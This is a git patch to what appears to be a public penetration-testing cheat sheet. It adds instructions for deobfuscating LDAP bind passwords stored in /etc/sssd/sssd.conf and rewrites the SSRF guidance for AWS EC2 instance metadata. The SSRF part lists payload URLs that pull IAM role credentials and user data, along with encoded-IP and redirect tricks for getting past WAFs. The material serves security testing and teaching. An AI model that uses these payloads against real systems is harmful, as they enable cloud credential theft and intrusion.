From 113afae2904fbab815ec041569bf497f46b10fad Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 27 Jun 2023 15:45:29 +0200 Subject: [PATCH] AWS EC2 Metadata + SSSD token deobfuscate --- .../Active Directory Attack.md | 28 +++++ .../Cloud - AWS Pentest.md | 2 +- Server Side Request Forgery/README.md | 103 +++++++++--------- 3 files changed, 82 insertions(+), 51 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 95a255e..d51d867 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -143,6 +143,7 @@ - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) + - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf) - [References](#references) ## Tools @@ -4276,6 +4277,33 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 ``` + +## Extract accounts from /etc/sssd/sssd.conf + +> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf + +The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password". + +```ini +[sssd] +config_file_version = 2 +... +[domain/LDAP] +... +ldap_uri = ldap://127.0.0.1 +ldap_search_base = ou=People,dc=srv,dc=world +ldap_default_authtok_type = obfuscated_password +ldap_default_authtok = [BASE64_ENCODED_TOKEN] +``` + +De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate) + +```ps1 +./sss_deobfuscate [ldap_default_authtok_base64_encoded] +./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID +``` + + ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 3d47175..fc8d999 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -249,7 +249,7 @@ :warning: Only working with IMDSv1. Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. -In order to usr IMDSv2 you must provide a token. +In order to use IMDSv2 you must provide a token. ```powershell export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 5ce4365..db9ad9d 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -545,77 +545,80 @@ Example of a PDF attachment using HTML ## SSRF URL for Cloud Instances -### SSRF URL for AWS Bucket +### SSRF URL for AWS -[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) -Interesting path to look for at `http://169.254.169.254` or `http://instance-data` +The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) + +* Old endpoint: `http://169.254.169.254/latest/meta-data/` +* New endpoint requires the header `X-aws-ec2-metadata-token` + ```powershell + export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` + curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" + ``` + +In case of a WAF, you might want to try different ways to connect to the API. +* DNS record pointing to the AWS API IP + ```powershell + http://instance-data + http://169.254.169.254 + http://169.254.169.254.nip.io/ + ``` +* HTTP redirect + ```powershell + Static:http://nicob.net/redir6a + Dynamic:http://nicob.net/redir-http-169.254.169.254:80- + ``` +* Encoding the IP to bypass WAF + ```powershell + http://425.510.425.510 Dotted decimal with overflow + http://2852039166 Dotless decimal + http://7147006462 Dotless decimal with overflow + http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal + http://0xA9FEA9FE Dotless hexadecimal + http://0x41414141A9FEA9FE Dotless hexadecimal with overflow + http://0251.0376.0251.0376 Dotted octal + http://0251.00376.000251.0000376 Dotted octal with padding + http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) + http://[::ffff:a9fe:a9fe] IPV6 Compressed + http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ``` + + +These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role. ```powershell -Always here : /latest/meta-data/{hostname,public-ipv4,...} -User data (startup script for auto-scaling) : /latest/user-data -Temporary AWS credentials : /latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/meta-data/iam/security-credentials +http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] + +# Examples +http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance +http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy +http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access ``` -DNS record - -```powershell -http://instance-data -http://169.254.169.254 -http://169.254.169.254.nip.io/ -``` - -HTTP redirect - -```powershell -Static:http://nicob.net/redir6a -Dynamic:http://nicob.net/redir-http-169.254.169.254:80- -``` - -Alternate IP encoding - -```powershell -http://425.510.425.510/ Dotted decimal with overflow -http://2852039166/ Dotless decimal -http://7147006462/ Dotless decimal with overflow -http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal -http://0xA9FEA9FE/ Dotless hexadecimal -http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow -http://0251.0376.0251.0376/ Dotted octal -http://0251.00376.000251.0000376/ Dotted octal with padding -http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) -``` - -More urls to include - +This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance. ```powershell http://169.254.169.254/latest/user-data -http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] +``` + +Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties. +```powershell http://169.254.169.254/latest/meta-data/ -http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] -http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance http://169.254.169.254/latest/meta-data/ami-id http://169.254.169.254/latest/meta-data/reservation-id http://169.254.169.254/latest/meta-data/hostname http://169.254.169.254/latest/meta-data/public-keys/ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key -http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy -http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access http://169.254.169.254/latest/dynamic/instance-identity/document ``` -AWS SSRF Bypasses -``` -Converted Decimal IP: http://2852039166/latest/meta-data/ -IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ -IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/ -IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/ -``` - E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance` E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` + ### SSRF URL for AWS ECS If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.